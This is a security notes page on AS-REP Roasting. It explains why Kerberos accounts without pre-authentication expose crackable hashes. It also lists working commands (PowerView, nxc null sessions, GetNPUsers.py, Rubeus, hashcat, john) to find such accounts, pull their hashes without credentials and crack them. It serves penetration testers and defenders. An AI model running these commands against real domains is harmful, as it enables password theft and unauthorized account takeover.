Security Notes

Appearance

AS-REP Roasting

Kerberos pre-authentication forces a client to prove they know the user's password before the KDC issues a TGT. When pre-auth is disabled (UF_DONT_REQUIRE_PREAUTH), the KDC returns an AS-REP encrypted with the user's hash to anyone who asks: no credentials required to grab it.

Why It Works

  • The AS-REP contains a blob encrypted with RC4-HMAC derived from the account's password
  • Without pre-auth, the KDC doesn't verify the requestor's identity
  • You only need to know the username: useful in unauthenticated scenarios when you have a user list
  • Hash mode 18200 in hashcat

Finding Vulnerable Accounts

Search for accounts with UF_DONT_REQUIRE_PREAUTH (UAC flag 0x400000) set.

powershell
# PowerView
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | Select-Object samaccountname, description

# LDAP filter (raw)
Get-ADUser -Filter * -Properties UserAccountControl |
  Where-Object { $_.UserAccountControl -band 0x400000 } |
  Select-Object Name, SamAccountName
bash
# nxc: with creds
nxc ldap <ip> -u user -p pass --asreproast hashes.txt

# nxc: null session (if LDAP anonymous bind is allowed)
nxc ldap <ip> -u '' -p '' --asreproast hashes.txt

# BloodHound query
# "Find AS-REP Roastable Users" built-in query

Requesting Hashes

Get the AS-REP without cracking: works with or without valid credentials.

bash
# Without credentials: requires a username list
GetNPUsers.py domain.local/ -dc-ip <ip> -no-pass -usersfile users.txt -format hashcat -outputfile hashes.txt

# With credentials: discovers accounts automatically
GetNPUsers.py domain.local/user:pass -dc-ip <ip> -request -format hashcat -outputfile hashes.txt

# Request for a specific account
GetNPUsers.py domain.local/ -dc-ip <ip> -no-pass -usersfile single_user.txt -format hashcat
powershell
# Rubeus: all AS-REP roastable accounts
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Rubeus: specific account
Rubeus.exe asreproast /user:target_user /format:hashcat /outfile:hashes.txt

# Rubeus: without existing TGT (unauthenticated)
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /domain:domain.local /dc:<dc-ip>

Cracking

bash
# hashcat mode 18200
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for mangled passwords
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# john
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt